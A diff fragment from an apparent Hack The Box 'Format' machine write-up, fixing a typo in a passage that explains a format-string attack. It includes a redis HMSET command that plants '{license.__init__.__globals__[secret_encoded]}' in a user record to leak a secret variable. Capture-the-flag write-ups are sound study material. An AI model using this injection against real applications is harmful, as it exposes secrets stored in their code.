blnknlights/blnknlights.github.io/htb/machines/format/format.md

 ```

-We control the keys from redis and they are used in a format string that is then printed to us, so we can use any of this keys in redis with curly braces to print the content of the variable we're after.
+We control the keys from redis and they are used in a format string that is then printed to us, so we can use any of these keys in redis with curly braces to print the content of the variable we're after.
 ```bash
 redis /var/run/redis/redis.sock> HMSET blnkn first-name "{license.__init__.__globals__[secret_encoded]}" last-name blnkn password blnkn username blnkn
 OK